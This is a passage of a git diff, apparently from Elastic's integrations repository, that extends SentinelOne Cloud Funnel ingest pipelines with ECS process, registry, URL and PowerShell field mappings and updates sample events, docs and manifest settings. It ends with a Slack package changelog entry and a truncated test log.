[info] + override: false on_failure: - append: field: error.message diff --git a/packages/sentinel_one_cloud_funnel/data_stream/event/elasticsearch/ingest_pipeline/pipeline-process.yml b/packages/sentinel_one_cloud_funnel/data_stream/event/elasticsearch/ingest_pipeline/pipeline-process.yml index 6a53d5a7b5f..f086f55e5c4 100644 --- a/packages/sentinel_one_cloud_funnel/data_stream/event/elasticsearch/ingest_pipeline/pipeline-process.yml +++ b/packages/sentinel_one_cloud_funnel/data_stream/event/elasticsearch/ingest_pipeline/pipeline-process.yml @@ -6,7 +6,19 @@ processors: value: [process] - set: field: event.type - value: [info] + value: [start] + if: ctx.sentinel_one_cloud_funnel?.event?.meta_event_name == 'PROCESSCREATION' + - set: + field: event.type + value: [end] + if: ( + ctx.sentinel_one_cloud_funnel?.event?.type == 'ProcessExit' || ctx.sentinel_one_cloud_funnel?.event?.type == 'ProcessTermination' || + ctx.sentinel_one_cloud_funnel?.event?.type == 'Process Exit' || ctx.sentinel_one_cloud_funnel?.event?.type == 'Process Termination' + ) + - set: + field: event.action + copy_from: event.type + ignore_empty_value: true - rename: field: json.k8sCluster.containerId target_field: sentinel_one_cloud_funnel.event.k8s_cluster.container.id @@ -265,6 +277,10 @@ processors: field: json.tgt.process.publisher target_field: sentinel_one_cloud_funnel.event.tgt.process.publisher ignore_missing: true + - set: + field: process.code_signature.subject_name + copy_from: sentinel_one_cloud_funnel.event.tgt.process.publisher + ignore_empty_value: true - rename: field: json.tgt.process.reasonSignatureInvalid target_field: sentinel_one_cloud_funnel.event.tgt.process.reason_signature_invalid @@ -284,6 +300,14 @@ processors: field: json.tgt.process.signedStatus target_field: sentinel_one_cloud_funnel.event.tgt.process.signed_status ignore_missing: true + - set: + field: process.code_signature.exists + value: true + if: ctx.sentinel_one_cloud_funnel?.event?.tgt?.process?.signed_status == 'signed' + - set: + field: process.code_signature.exists + value: false + if: ctx.sentinel_one_cloud_funnel?.event?.tgt?.process?.signed_status != 'signed' - date: field: json.tgt.process.startTime tag: 'date_json_tgt_process_startTime' @@ -312,6 +336,14 @@ processors: field: json.tgt.process.verifiedStatus target_field: sentinel_one_cloud_funnel.event.tgt.process.verified_status ignore_missing: true + - set: + field: process.code_signature.trusted + value: true + if: ctx.sentinel_one_cloud_funnel?.event?.tgt?.process?.verified_status == 'verified' + - set: + field: process.code_signature.trusted + value: false + if: ctx.process?.code_signature?.exists == true && ctx.sentinel_one_cloud_funnel?.event?.tgt?.process?.verified_status != 'verified' - remove: field: - process.parent @@ -327,6 +359,10 @@ processors: field: process.name copy_from: sentinel_one_cloud_funnel.event.tgt.process.name ignore_empty_value: true + - set: + field: process.executable + copy_from: sentinel_one_cloud_funnel.event.tgt.process.image.path + ignore_empty_value: true - convert: field: sentinel_one_cloud_funnel.event.tgt.process.pid target_field: process.pid diff --git a/packages/sentinel_one_cloud_funnel/data_stream/event/elasticsearch/ingest_pipeline/pipeline-registry.yml b/packages/sentinel_one_cloud_funnel/data_stream/event/elasticsearch/ingest_pipeline/pipeline-registry.yml index 096a22b276f..b205a0636df 100644 --- a/packages/sentinel_one_cloud_funnel/data_stream/event/elasticsearch/ingest_pipeline/pipeline-registry.yml +++ b/packages/sentinel_one_cloud_funnel/data_stream/event/elasticsearch/ingest_pipeline/pipeline-registry.yml @@ -16,22 +16,59 @@ processors: field: event.type value: [change] if: ctx.sentinel_one_cloud_funnel?.event?.type != null && (ctx.sentinel_one_cloud_funnel?.event?.type.toLowerCase().contains('change') || ctx.sentinel_one_cloud_funnel?.event?.type.toLowerCase().contains('modif')) + - set: + field: event.action + value: [creation] + if: ctx.sentinel_one_cloud_funnel?.event?.type != null && + ( + ctx.sentinel_one_cloud_funnel?.event?.meta_event_name.toLowerCase().contains('regvaluecreate') || + ctx.sentinel_one_cloud_funnel?.event?.meta_event_name.toLowerCase().contains('regkeycreate') + ) + - set: + field: event.action + value: [modification] + if: ctx.sentinel_one_cloud_funnel?.event?.type != null && ctx.sentinel_one_cloud_funnel?.event?.meta_event_name.toLowerCase().contains('regvaluemodified') + - set: + field: event.action + value: [deletion] + if: ctx.sentinel_one_cloud_funnel?.event?.type != null && + ( + ctx.sentinel_one_cloud_funnel?.event?.meta_event_name.toLowerCase().contains('regvaluedelete') || + ctx.sentinel_one_cloud_funnel?.event?.meta_event_name.toLowerCase().contains('regkeydelete') + ) - rename: field: json.registry.keyPath target_field: sentinel_one_cloud_funnel.event.registry.key.path ignore_missing: true - set: - field: registry.key + field: registry.path copy_from: sentinel_one_cloud_funnel.event.registry.key.path ignore_empty_value: true + - script: + lang: painless + if: ctx.registry?.path instanceof String && ctx.registry.path != "" + source: |- + def idx = ctx.registry.path.lastIndexOf('\\'); + if (idx >= 0) { + ctx.registry.key = ctx.registry.path.substring(0, idx); + ctx.registry.value = ctx.registry.path.substring(idx+1); + } - rename: field: json.registry.value target_field: sentinel_one_cloud_funnel.event.registry.val ignore_missing: true - set: - field: registry.value + field: registry.data.strings copy_from: sentinel_one_cloud_funnel.event.registry.val ignore_empty_value: true + - rename: + field: json.registry.valueType + target_field: sentinel_one_cloud_funnel.event.registry.value.type + ignore_missing: true + - set: + field: registry.data.type + copy_from: sentinel_one_cloud_funnel.event.registry.value.type + ignore_empty_value: true - rename: field: json.registry.keyUid target_field: sentinel_one_cloud_funnel.event.registry.key.uid diff --git a/packages/sentinel_one_cloud_funnel/data_stream/event/elasticsearch/ingest_pipeline/pipeline-url.yml b/packages/sentinel_one_cloud_funnel/data_stream/event/elasticsearch/ingest_pipeline/pipeline-url.yml index 6a9bc42d44a..2b42e387ae3 100644 --- a/packages/sentinel_one_cloud_funnel/data_stream/event/elasticsearch/ingest_pipeline/pipeline-url.yml +++ b/packages/sentinel_one_cloud_funnel/data_stream/event/elasticsearch/ingest_pipeline/pipeline-url.yml @@ -9,6 +9,18 @@ processors: field: url.original copy_from: sentinel_one_cloud_funnel.event.url.address ignore_empty_value: true + - uri_parts: + field: url.original + keep_original: true + ignore_missing: true + - set: + field: destination.address + copy_from: url.domain + ignore_empty_value: true + - registered_domain: + field: destination.address + target_field: destination + if: ctx.destination?.address != null - rename: field: json.event.url.action target_field: sentinel_one_cloud_funnel.event.url.action diff --git a/packages/sentinel_one_cloud_funnel/data_stream/event/fields/fields.yml b/packages/sentinel_one_cloud_funnel/data_stream/event/fields/fields.yml index f41bd74a7cf..9a5a0eacafb 100644 --- a/packages/sentinel_one_cloud_funnel/data_stream/event/fields/fields.yml +++ b/packages/sentinel_one_cloud_funnel/data_stream/event/fields/fields.yml @@ -1502,3 +1502,13 @@ description: Complete URL. - name: source type: keyword +- name: powershell.file + type: group + fields: + - name: script_block_text + type: text + analyzer: powershell_script_analyzer + description: > + Text of the executed script block. + + example: ".\\a_script.ps1" diff --git a/packages/sentinel_one_cloud_funnel/data_stream/event/manifest.yml b/packages/sentinel_one_cloud_funnel/data_stream/event/manifest.yml index a2363f51a90..6d0b4e18062 100644 --- a/packages/sentinel_one_cloud_funnel/data_stream/event/manifest.yml +++ b/packages/sentinel_one_cloud_funnel/data_stream/event/manifest.yml @@ -1,4 +1,12 @@ title: Collect Event logs from SentinelOne Cloud Funnel. +elasticsearch: + index_template: + settings: + analysis: + analyzer: + powershell_script_analyzer: + type: pattern + pattern: '[\W&&[^-]]+' type: logs streams: - input: aws-s3 @@ -184,3 +192,11 @@ streams: default: - forwarded - sentinel_one_cloud_funnel-event + - name: preserve_original_event + required: false + show_user: true + title: Preserve original event + description: Preserves a raw copy of the original event, added to the field `event.original`. + type: bool + multi: false + default: false diff --git a/packages/sentinel_one_cloud_funnel/data_stream/event/sample_event.json b/packages/sentinel_one_cloud_funnel/data_stream/event/sample_event.json index e22d5ea5ce0..2957f16e8cd 100644 --- a/packages/sentinel_one_cloud_funnel/data_stream/event/sample_event.json +++ b/packages/sentinel_one_cloud_funnel/data_stream/event/sample_event.json @@ -1,17 +1,17 @@ { "@timestamp": "2022-10-25T07:47:24.180Z", "agent": { - "ephemeral_id": "26afb86c-4349-4dc3-8efa-fe82afd55bcf", - "id": "acba78ef-1401-4689-977c-d8c2e5d6a8fa", + "ephemeral_id": "82352929-5f46-412e-a787-c016dde956f9", + "id": "066f269f-8d0a-49c6-88da-ba06e5a70c88", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.10.1" + "version": "8.13.0" }, "aws": { "s3": { "bucket": { - "arn": "arn:aws:s3:::elastic-package-sentinel-one-bucket-47039", - "name": "elastic-package-sentinel-one-bucket-47039" + "arn": "arn:aws:s3:::elastic-package-sentinel-one-bucket-53400", + "name": "elastic-package-sentinel-one-bucket-53400" }, "object": { "key": "command_script.log" @@ -30,9 +30,9 @@ "version": "8.11.0" }, "elastic_agent": { - "id": "acba78ef-1401-4689-977c-d8c2e5d6a8fa", + "id": "066f269f-8d0a-49c6-88da-ba06e5a70c88", "snapshot": false, - "version": "8.10.1" + "version": "8.13.0" }, "event": { "agent_id_status": "verified", @@ -41,7 +41,7 @@ ], "dataset": "sentinel_one_cloud_funnel.event", "id": "01GG71RXEEHZQFY6XZ1WGS2BAE_168", - "ingested": "2023-11-02T13:59:39Z", + "ingested": "2024-04-04T22:17:38Z", "kind": "event", "original": "{\"timestamp\":\"10:47:24.180\",\"src.process.parent.isStoryline™Root\":false,\"event.category\":\"command_script\",\"src.process.parent.image.sha1\":\"134fd2ad04cf59b0c10596230da5daf6fc711bd1\",\"site.id\":\"123456789123456789\",\"src.process.image.binaryIsExecutable\":true,\"src.process.parent.displayName\":\"MicrosoftCompatibilityTelemetry\",\"src.process.user\":\"NTAUTHORITY\\\\SYSTEM\",\"src.process.parent.subsystem\":\"SYS_WIN32\",\"src.process.indicatorRansomwareCount\":0,\"src.process.crossProcessDupRemoteProcessHandleCount\":0,\"src.process.activeContent.signedStatus\":\"unsigned\",\"src.process.tgtFileCreationCount\":0,\"src.process.indicatorInjectionCount\":0,\"src.process.moduleCount\":284,\"src.process.parent.name\":\"CompatTelRunner.exe\",\"i.version\":\"preprocess-lib-1.0\",\"src.process.activeContentType\":\"CLI\",\"sca:atlantisIngestTime\":1666684057507,\"src.process.image.md5\":\"7353f60b1739074eb17c5f4dddefe239\",\"src.process.indicatorReconnaissanceCount\":8,\"src.process.Storyline™.id\":\"87EE3C19E0250305\",\"src.process.childProcCount\":1,\"mgmt.url\":\"asdf-123.sentinelone.org\",\"src.process.crossProcessOpenProcessCount\":0,\"cmdScript.isComplete\":true,\"src.process.subsystem\":\"SYS_WIN32\",\"meta.event.name\":\"SCRIPTS\",\"src.process.parent.integrityLevel\":\"SYSTEM\",\"src.process.indicatorExploitationCount\":0,\"src.process.parent.Storyline™.id\":\"87EE3C19E0250305\",\"i.scheme\":\"edr\",\"src.process.integrityLevel\":\"SYSTEM\",\"site.name\":\"ASDF\",\"src.process.netConnInCount\":0,\"event.time\":1666684044180,\"account.id\":\"123456789123456789\",\"dataSource.name\":\"SentinelOne\",\"endpoint.name\":\"asdf1\",\"src.process.image.sha1\":\"6cbce4a295c163791b60fc23d285e6d84f28ee4c\",\"src.process.isStoryline™Root\":false,\"cmdScript.applicationName\":\"PowerShell_C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe_10.0.17763.1\",\"src.process.parent.image.path\":\"C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe\",\"src.process.pid\":5912,\"tgt.file.isSigned\":\"signed\",\"sca:ingestTime\":1666684063,\"dataSource.category\":\"security\",\"src.process.cmdline\":\"powershell.exe-ExecutionPolicyRestricted-CommandWrite-Host'Finalresult:1';\",\"src.process.publisher\":\"MICROSOFTWINDOWS\",\"src.process.crossProcessThreadCreateCount\":0,\"src.process.parent.isNative64Bit\":false,\"src.process.parent.isRedirectCmdProcessor\":false,\"src.process.signedStatus\":\"signed\",\"src.process.crossProcessCount\":0,\"event.id\":\"01GG71RXEEHZQFY6XZ1WGS2BAE_168\",\"src.process.parent.cmdline\":\"C:\\\\Windows\\\\system32\\\\CompatTelRunner.exe-m:appraiser.dll-f:DoScheduledTelemetryRun-cv:1DRRwZous0W15sCL.2\",\"cmdScript.content\":\"$global:?\",\"src.process.image.path\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"src.process.tgtFileModificationCount\":4,\"src.process.indicatorEvasionCount\":1,\"src.process.netConnOutCount\":0,\"cmdScript.sha256\":\"feb60de98632d9f666e16e89bd1c99174801c761115d4a9f52f05ef41e397d2d\",\"src.process.crossProcessDupThreadHandleCount\":0,\"endpoint.os\":\"windows\",\"src.process.tgtFileDeletionCount\":0,\"src.process.startTime\":1666684041917,\"mgmt.id\":\"1337\",\"os.name\":\"WindowsServer2019Standard\",\"src.process.activeContent.id\":\"3EFA3EFA3EFA3EFA\",\"src.process.displayName\":\"WindowsPowerShell\",\"src.process.activeContent.path\":\"\\\\Unknowndevice\\\\Unknownfile\",\"src.process.isNative64Bit\":false,\"src.process.parent.sessionId\":0,\"src.process.uid\":\"230B188E26085676\",\"src.process.parent.image.md5\":\"47dd94d79d9bac54a2c3a1cf502770c6\",\"src.process.indicatorInfostealerCount\":0,\"src.process.indicatorBootConfigurationUpdateCount\":0,\"process.unique.key\":\"230B188E26085676\",\"cmdScript.originalSize\":18,\"agent.version\":\"22.1.4.10010\",\"src.process.parent.uid\":\"8608188E26085676\",\"src.process.parent.image.sha256\":\"046f009960f70981597cd7b3a1e44cbb4ba5893cc1407734366aa55fbeda5d66\",\"src.process.sessionId\":0,\"src.process.netConnCount\":0,\"mgmt.osRevision\":\"17763\",\"group.id\":\"asdf\",\"src.process.isRedirectCmdProcessor\":false,\"src.process.verifiedStatus\":\"verified\",\"src.process.parent.publisher\":\"MICROSOFTWINDOWS\",\"src.process.parent.startTime\":1666683971590,\"src.process.dnsCount\":0,\"endpoint.type\":\"server\",\"trace.id\":\"01GG71RXEEHZQFY6XZ1WGS2BAE\",\"src.process.name\":\"powershell.exe\",\"agent.uuid\":\"asdf356783457dfds4456d65\",\"src.process.activeContent.hash\":\"a8ae2c841e3f0f39d494a45370815a90cf00421e\",\"src.process.image.sha256\":\"de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c\",\"src.process.indicatorGeneralCount\":49,\"src.process.crossProcessOutOfStoryline™Count\":0,\"src.process.registryChangeCount\":0,\"packet.id\":\"9CB6AC4F10C34F5BB0A2788760E870F5\",\"src.process.indicatorPersistenceCount\":0,\"src.process.parent.signedStatus\":\"signed\",\"src.process.parent.user\":\"NTAUTHORITY\\\\SYSTEM\",\"event.type\":\"CommandScript\",\"src.process.indicatorPostExploitationCount\":0,\"src.process.parent.pid\":6008}", "type": [ @@ -53,9 +53,11 @@ }, "host": { "hostname": "asdf1", + "id": "asdf356783457dfds4456d65", "os": { "name": "WindowsServer2019Standard", - "platform": "windows" + "platform": "windows", + "type": "windows" }, "type": "server" }, @@ -64,12 +66,28 @@ }, "log": { "file": { - "path": "https://elastic-package-sentinel-one-bucket-47039.s3.us-east-1.amazonaws.com/command_script.log" + "path": "https://elastic-package-sentinel-one-bucket-53400.s3.us-east-1.amazonaws.com/command_script.log" }, "offset": 0 }, + "powershell": { + "file": { + "script_block_text": "$global:?" + } + }, "process": { + "args": [ + "powershell.exe-ExecutionPolicyRestricted-CommandWrite-Host'Finalresult:1';" + ], + "args_count": 1, + "code_signature": { + "exists": true, + "subject_name": "MICROSOFTWINDOWS", + "trusted": true + }, "command_line": "powershell.exe-ExecutionPolicyRestricted-CommandWrite-Host'Finalresult:1';", + "entity_id": "230B188E26085676", + "executable": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "hash": { "md5": "7353f60b1739074eb17c5f4dddefe239", "sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c", @@ -77,7 +95,13 @@ }, "name": "powershell.exe", "parent": { + "args": [ + "C:\\Windows\\system32\\CompatTelRunner.exe-m:appraiser.dll-f:DoScheduledTelemetryRun-cv:1DRRwZous0W15sCL.2" + ], + "args_count": 1, "command_line": "C:\\Windows\\system32\\CompatTelRunner.exe-m:appraiser.dll-f:DoScheduledTelemetryRun-cv:1DRRwZous0W15sCL.2", + "entity_id": "8608188E26085676", + "executable": "C:\\Windows\\System32\\CompatTelRunner.exe", "hash": { "sha1": "134fd2ad04cf59b0c10596230da5daf6fc711bd1", "sha256": "046f009960f70981597cd7b3a1e44cbb4ba5893cc1407734366aa55fbeda5d66" @@ -239,7 +263,7 @@ "is_signed": "signed" } }, - "timestamp": "2023-01-01T10:47:24.180Z", + "timestamp": "2024-01-01T10:47:24.180Z", "trace_id": "01GG71RXEEHZQFY6XZ1WGS2BAE", "type": "CommandScript" } @@ -249,5 +273,9 @@ "preserve_original_event", "forwarded", "sentinel_one_cloud_funnel-event" - ] -} + ], + "user": { + "domain": "NTAUTHORITY", + "name": "SYSTEM" + } +} \ No newline at end of file diff --git a/packages/sentinel_one_cloud_funnel/docs/README.md b/packages/sentinel_one_cloud_funnel/docs/README.md index a03ef36155e..addd1fe62b9 100644 --- a/packages/sentinel_one_cloud_funnel/docs/README.md +++ b/packages/sentinel_one_cloud_funnel/docs/README.md @@ -152,17 +152,17 @@ An example event for `event` looks as following: { "@timestamp": "2022-10-25T07:47:24.180Z", "agent": { - "ephemeral_id": "26afb86c-4349-4dc3-8efa-fe82afd55bcf", - "id": "acba78ef-1401-4689-977c-d8c2e5d6a8fa", + "ephemeral_id": "82352929-5f46-412e-a787-c016dde956f9", + "id": "066f269f-8d0a-49c6-88da-ba06e5a70c88", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.10.1" + "version": "8.13.0" }, "aws": { "s3": { "bucket": { - "arn": "arn:aws:s3:::elastic-package-sentinel-one-bucket-47039", - "name": "elastic-package-sentinel-one-bucket-47039" + "arn": "arn:aws:s3:::elastic-package-sentinel-one-bucket-53400", + "name": "elastic-package-sentinel-one-bucket-53400" }, "object": { "key": "command_script.log" @@ -181,9 +181,9 @@ An example event for `event` looks as following: "version": "8.11.0" }, "elastic_agent": { - "id": "acba78ef-1401-4689-977c-d8c2e5d6a8fa", + "id": "066f269f-8d0a-49c6-88da-ba06e5a70c88", "snapshot": false, - "version": "8.10.1" + "version": "8.13.0" }, "event": { "agent_id_status": "verified", @@ -192,7 +192,7 @@ An example event for `event` looks as following: ], "dataset": "sentinel_one_cloud_funnel.event", "id": "01GG71RXEEHZQFY6XZ1WGS2BAE_168", - "ingested": "2023-11-02T13:59:39Z", + "ingested": "2024-04-04T22:17:38Z", "kind": "event", "original": "{\"timestamp\":\"10:47:24.180\",\"src.process.parent.isStoryline™Root\":false,\"event.category\":\"command_script\",\"src.process.parent.image.sha1\":\"134fd2ad04cf59b0c10596230da5daf6fc711bd1\",\"site.id\":\"123456789123456789\",\"src.process.image.binaryIsExecutable\":true,\"src.process.parent.displayName\":\"MicrosoftCompatibilityTelemetry\",\"src.process.user\":\"NTAUTHORITY\\\\SYSTEM\",\"src.process.parent.subsystem\":\"SYS_WIN32\",\"src.process.indicatorRansomwareCount\":0,\"src.process.crossProcessDupRemoteProcessHandleCount\":0,\"src.process.activeContent.signedStatus\":\"unsigned\",\"src.process.tgtFileCreationCount\":0,\"src.process.indicatorInjectionCount\":0,\"src.process.moduleCount\":284,\"src.process.parent.name\":\"CompatTelRunner.exe\",\"i.version\":\"preprocess-lib-1.0\",\"src.process.activeContentType\":\"CLI\",\"sca:atlantisIngestTime\":1666684057507,\"src.process.image.md5\":\"7353f60b1739074eb17c5f4dddefe239\",\"src.process.indicatorReconnaissanceCount\":8,\"src.process.Storyline™.id\":\"87EE3C19E0250305\",\"src.process.childProcCount\":1,\"mgmt.url\":\"asdf-123.sentinelone.org\",\"src.process.crossProcessOpenProcessCount\":0,\"cmdScript.isComplete\":true,\"src.process.subsystem\":\"SYS_WIN32\",\"meta.event.name\":\"SCRIPTS\",\"src.process.parent.integrityLevel\":\"SYSTEM\",\"src.process.indicatorExploitationCount\":0,\"src.process.parent.Storyline™.id\":\"87EE3C19E0250305\",\"i.scheme\":\"edr\",\"src.process.integrityLevel\":\"SYSTEM\",\"site.name\":\"ASDF\",\"src.process.netConnInCount\":0,\"event.time\":1666684044180,\"account.id\":\"123456789123456789\",\"dataSource.name\":\"SentinelOne\",\"endpoint.name\":\"asdf1\",\"src.process.image.sha1\":\"6cbce4a295c163791b60fc23d285e6d84f28ee4c\",\"src.process.isStoryline™Root\":false,\"cmdScript.applicationName\":\"PowerShell_C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe_10.0.17763.1\",\"src.process.parent.image.path\":\"C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe\",\"src.process.pid\":5912,\"tgt.file.isSigned\":\"signed\",\"sca:ingestTime\":1666684063,\"dataSource.category\":\"security\",\"src.process.cmdline\":\"powershell.exe-ExecutionPolicyRestricted-CommandWrite-Host'Finalresult:1';\",\"src.process.publisher\":\"MICROSOFTWINDOWS\",\"src.process.crossProcessThreadCreateCount\":0,\"src.process.parent.isNative64Bit\":false,\"src.process.parent.isRedirectCmdProcessor\":false,\"src.process.signedStatus\":\"signed\",\"src.process.crossProcessCount\":0,\"event.id\":\"01GG71RXEEHZQFY6XZ1WGS2BAE_168\",\"src.process.parent.cmdline\":\"C:\\\\Windows\\\\system32\\\\CompatTelRunner.exe-m:appraiser.dll-f:DoScheduledTelemetryRun-cv:1DRRwZous0W15sCL.2\",\"cmdScript.content\":\"$global:?\",\"src.process.image.path\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"src.process.tgtFileModificationCount\":4,\"src.process.indicatorEvasionCount\":1,\"src.process.netConnOutCount\":0,\"cmdScript.sha256\":\"feb60de98632d9f666e16e89bd1c99174801c761115d4a9f52f05ef41e397d2d\",\"src.process.crossProcessDupThreadHandleCount\":0,\"endpoint.os\":\"windows\",\"src.process.tgtFileDeletionCount\":0,\"src.process.startTime\":1666684041917,\"mgmt.id\":\"1337\",\"os.name\":\"WindowsServer2019Standard\",\"src.process.activeContent.id\":\"3EFA3EFA3EFA3EFA\",\"src.process.displayName\":\"WindowsPowerShell\",\"src.process.activeContent.path\":\"\\\\Unknowndevice\\\\Unknownfile\",\"src.process.isNative64Bit\":false,\"src.process.parent.sessionId\":0,\"src.process.uid\":\"230B188E26085676\",\"src.process.parent.image.md5\":\"47dd94d79d9bac54a2c3a1cf502770c6\",\"src.process.indicatorInfostealerCount\":0,\"src.process.indicatorBootConfigurationUpdateCount\":0,\"process.unique.key\":\"230B188E26085676\",\"cmdScript.originalSize\":18,\"agent.version\":\"22.1.4.10010\",\"src.process.parent.uid\":\"8608188E26085676\",\"src.process.parent.image.sha256\":\"046f009960f70981597cd7b3a1e44cbb4ba5893cc1407734366aa55fbeda5d66\",\"src.process.sessionId\":0,\"src.process.netConnCount\":0,\"mgmt.osRevision\":\"17763\",\"group.id\":\"asdf\",\"src.process.isRedirectCmdProcessor\":false,\"src.process.verifiedStatus\":\"verified\",\"src.process.parent.publisher\":\"MICROSOFTWINDOWS\",\"src.process.parent.startTime\":1666683971590,\"src.process.dnsCount\":0,\"endpoint.type\":\"server\",\"trace.id\":\"01GG71RXEEHZQFY6XZ1WGS2BAE\",\"src.process.name\":\"powershell.exe\",\"agent.uuid\":\"asdf356783457dfds4456d65\",\"src.process.activeContent.hash\":\"a8ae2c841e3f0f39d494a45370815a90cf00421e\",\"src.process.image.sha256\":\"de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c\",\"src.process.indicatorGeneralCount\":49,\"src.process.crossProcessOutOfStoryline™Count\":0,\"src.process.registryChangeCount\":0,\"packet.id\":\"9CB6AC4F10C34F5BB0A2788760E870F5\",\"src.process.indicatorPersistenceCount\":0,\"src.process.parent.signedStatus\":\"signed\",\"src.process.parent.user\":\"NTAUTHORITY\\\\SYSTEM\",\"event.type\":\"CommandScript\",\"src.process.indicatorPostExploitationCount\":0,\"src.process.parent.pid\":6008}", "type": [ @@ -204,9 +204,11 @@ An example event for `event` looks as following: }, "host": { "hostname": "asdf1", + "id": "asdf356783457dfds4456d65", "os": { "name": "WindowsServer2019Standard", - "platform": "windows" + "platform": "windows", + "type": "windows" }, "type": "server" }, @@ -215,12 +217,28 @@ An example event for `event` looks as following: }, "log": { "file": { - "path": "https://elastic-package-sentinel-one-bucket-47039.s3.us-east-1.amazonaws.com/command_script.log" + "path": "https://elastic-package-sentinel-one-bucket-53400.s3.us-east-1.amazonaws.com/command_script.log" }, "offset": 0 }, + "powershell": { + "file": { + "script_block_text": "$global:?" + } + }, "process": { + "args": [ + "powershell.exe-ExecutionPolicyRestricted-CommandWrite-Host'Finalresult:1';" + ], + "args_count": 1, + "code_signature": { + "exists": true, + "subject_name": "MICROSOFTWINDOWS", + "trusted": true + }, "command_line": "powershell.exe-ExecutionPolicyRestricted-CommandWrite-Host'Finalresult:1';", + "entity_id": "230B188E26085676", + "executable": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "hash": { "md5": "7353f60b1739074eb17c5f4dddefe239", "sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c", @@ -228,7 +246,13 @@ An example event for `event` looks as following: }, "name": "powershell.exe", "parent": { + "args": [ + "C:\\Windows\\system32\\CompatTelRunner.exe-m:appraiser.dll-f:DoScheduledTelemetryRun-cv:1DRRwZous0W15sCL.2" + ], + "args_count": 1, "command_line": "C:\\Windows\\system32\\CompatTelRunner.exe-m:appraiser.dll-f:DoScheduledTelemetryRun-cv:1DRRwZous0W15sCL.2", + "entity_id": "8608188E26085676", + "executable": "C:\\Windows\\System32\\CompatTelRunner.exe", "hash": { "sha1": "134fd2ad04cf59b0c10596230da5daf6fc711bd1", "sha256": "046f009960f70981597cd7b3a1e44cbb4ba5893cc1407734366aa55fbeda5d66" @@ -390,7 +414,7 @@ An example event for `event` looks as following: "is_signed": "signed" } }, - "timestamp": "2023-01-01T10:47:24.180Z", + "timestamp": "2024-01-01T10:47:24.180Z", "trace_id": "01GG71RXEEHZQFY6XZ1WGS2BAE", "type": "CommandScript" } @@ -400,9 +424,12 @@ An example event for `event` looks as following: "preserve_original_event", "forwarded", "sentinel_one_cloud_funnel-event" - ] + ], + "user": { + "domain": "NTAUTHORITY", + "name": "SYSTEM" + } } - ``` **Exported fields** @@ -420,6 +447,7 @@ An example event for `event` looks as following: | event.module | Event module. | constant_keyword | | input.type | Type of filebeat input. | keyword | | log.offset | Log offset. | long | +| powershell.file.script_block_text | Text of the executed script block. | text | | sentinel_one_cloud_funnel.event.account_id | SentinelOne Account ID. | keyword | | sentinel_one_cloud_funnel.event.agent.uuid | Agent Unique ID. | keyword | | sentinel_one_cloud_funnel.event.agent.version | Version of SentinelOne Agent. | keyword | diff --git a/packages/sentinel_one_cloud_funnel/manifest.yml b/packages/sentinel_one_cloud_funnel/manifest.yml index 34ea19fc52f..bf4cf05e47c 100644 --- a/packages/sentinel_one_cloud_funnel/manifest.yml +++ b/packages/sentinel_one_cloud_funnel/manifest.yml @@ -1,13 +1,13 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: sentinel_one_cloud_funnel title: SentinelOne Cloud Funnel -version: "0.10.1" +version: "0.14.0" description: Collect logs from SentinelOne Cloud Funnel with Elastic Agent. type: integration categories: ["security", "edr_xdr"] conditions: kibana: - version: ^8.11.0 + version: ^8.10.1 elastic: subscription: basic screenshots: @@ -78,6 +78,7 @@ policy_templates: required: false show_user: true description: First part of access key. This parameter along with the secret_access_key parameter is required if we are not providing shared_credential_file. + secret: true - name: secret_access_key type: password title: Secret Access Key @@ -85,13 +86,15 @@ policy_templates: required: false show_user: true description: Second part of access key. This parameter along with the access_key_id parameter is required if we are not providing shared_credential_file. + secret: true - name: session_token - type: text + type: password title: Session Token multi: false required: false show_user: true description: Required when using temporary security credentials. + secret: true - name: shared_credential_file type: text title: Shared Credential File @@ -176,6 +179,7 @@ policy_templates: multi: false required: false show_user: true + secret: true - name: service_account_file type: text title: "JSON Credentials file path" diff --git a/packages/slack/changelog.yml b/packages/slack/changelog.yml index cb3d0343af0..67324febc33 100644 --- a/packages/slack/changelog.yml +++ b/packages/slack/changelog.yml @@ -1,4 +1,14 @@ # newer versions go on top +- version: "1.19.0" + changes: + - description: Map md5 hash detail for files. + type: enhancement + link: https://github.com/elastic/integrations/pull/9417 +- version: "1.18.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9128 - version: "1.17.1" changes: - description: Changed owners diff --git a/packages/slack/data_stream/audit/_dev/test/pipeline/test-audit.log b/packages/slack/data_stream/audit/_dev/test/pipeline/test-audit.log index 194b56eda8f..79c16cdff4b 100644 --- a/packages/slack/data_stream/audit/_dev/test/pipeline/test-audit.log +++ b/packages/slack/data_stream/audit/_dev/test/pipeline/test-audit.log @@ -2,4 +2,5 @@ {"id":"bdcb13e3-28a3-41f0-9ace-a20952def3a0","date_create":1566215192,"action":"user_created","actor":{"type":"user","user":{"id":"e65b0f5c","name":"roy","email":"aaron@demo.com"}},"entity":{"type":"user","user":{"id":"asdfasdf","name":"Joe Bob","email":"jbob@example.com","team":"T234SAH2"}},"context":{"location":{"type":"workspace","id":"e65b11aa","name":"Docker","domain":"Docker"},"ua":"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:23.0) Gecko/20131011 Firefox/23.0","ip_address":"81.2.69.143"}} {"action":"file_downloaded","actor":{"type":"user","user":{"email":"user.mcuser@abcd.co","id":"2f52269c-4f38-4f08-b56d-c2b968681dbd","name":"User 